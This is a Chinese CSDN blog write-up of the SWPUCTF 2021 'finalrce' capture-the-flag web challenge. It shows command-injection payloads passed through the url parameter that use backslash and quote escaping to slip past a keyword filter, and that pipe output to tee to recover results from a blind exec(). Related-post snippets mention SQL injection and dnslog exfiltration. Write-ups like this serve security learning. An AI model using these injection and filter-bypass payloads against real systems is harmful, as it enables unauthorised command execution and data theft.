[SWPUCTF 2021 新生赛]finalrce 做题记录

最新推荐文章于 2024-07-23 15:37:06 发布
最新推荐文章于 2024-07-23 15:37:06 发布
阅读量256 收藏 1
点赞数
文章标签: linux bash 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64222098/article/details/130067818
版权
文章讲述了在Linux环境中,当一些常用命令如ls被禁用时,如何使用tee命令结合exec()函数的特性,通过构造特定payload来绕过限制,从文件中获取结果。文中给出了具体示例,如通过?url参数执行tac和tee命令找到隐藏的flag。
摘要由CSDN通过智能技术生成

在这里插入图片描述
发现过滤了蛮多的。一般用的命令都被禁了。
分析:
在linux里有一个tee命令。这里贴一下菜鸟教程的解释。
在这里插入图片描述
由于函数exec()执行完不返回结果,所以我们可以借助tee把命令写到文件里面去。通过访问文件来得到结果。虽然ls被禁了,但是我们可以用转义符或者引号来绕过。构造payload如下:

?url=l\s /|tee 1.txt
或者?url=l's' /|tee 1.txt

然后去访问1.txt。

http://node1.anna.nssctf.cn:28158/1.txt

在这里插入图片描述
最终是在flllllaaaaaaggggggg里面找到的flag。
payload如下:

http://node1.anna.nssctf.cn:28158/?url=tac /flllll\aaaaaaggggggg|tee 2.txt

然后访问2.txt就可以了。

dockerere
关注
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 691
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 857
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]finalrce
2303_77293157的博客
07-16 324
因为本题没有过滤竖线|、注释符\,因此可以使用注释符进行过滤绕过,竖线进行命令拼接。tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。tee将想要执行的命令写入到一个文件里面,然后再去访问这个文件。tee命令用于读取标准输入的数据,并将其内容输出成文件。因为ls 和cat都被过滤了,所以都要绕过。1.打开代码后看到很多东西被过滤了;cat命令被过滤了,那直接用tac。1.利用dnslog带外。4.写文件然后访问文件。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1078
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1534
。。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2675
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
[SWPUCTF 2021 新生]finalrce(tee)
kuzemax的博客
05-29 238
可以看到的是没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。本来应该是url=ls/ 可是ls被过滤掉了,然后看别的up主说,l\s可以代替ls |是执行以下命令的意思。
[SWPUCTF 2021 新生]finalrce(管道符(|)+tee绕过exec无回显 反斜杠或者单(双)引号绕过正则表达式)
2401_84499442的博客
07-09 360
总结:当正则表达式没有过滤掉反斜杠或者单引号或者双引号(本题双引号被过滤,不再演示),那么可以使用单引号或者双引号包裹命令(ls cat等)任意一个字符,只要他们不是一个整体就行,或者使用反斜杠插入到命令里面(ca\t c\at等)即可实现绕过。由于正则表达式过滤掉了很多命令,但是注意看,反斜杠和单引号都没有被注释掉,那么我们就可以利用这一点来绕过被禁止掉的命令。得到敏感文件,再进行内容读取,由于cat和la同样被禁用,还是相同的方法。构造payload:url=l\s /|tee 1.txt;
[SWPUCTF 2021 新生]finalrce wp
Leaf_initial的博客
04-12 565
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。
NSSCTF-2021年SWPU联合新生
最新发布
2302_78903258的博客
07-23 1545
这里有文件上传,文件读取,还有链子,还禁用一些伪协议,就是没有禁用phar,提示已经十分明显了,虽然upload这里会进行重命名,phar是看文件内容的,改名字是没有关系的。我理解的作用就是在一些控制字符被过滤的时候,可以用转义符,让控制符失去原本的含义,变为字面量,但是作用不变。发现类似flag文件,但是直接访问的话没有内容,依旧是用tee命令输出内容,这里过滤la字符,所以我们要用。从read.php就可以知道是从aa类进入的,这里我们分析分析,可以不可以搞出来一个链子.
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1428
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
SWPUCTF 2021 新生 RCE题目
m0_74160536的博客
05-26 641
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
[SWPUCTF 2021 新生]hardrce
07-25
- *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值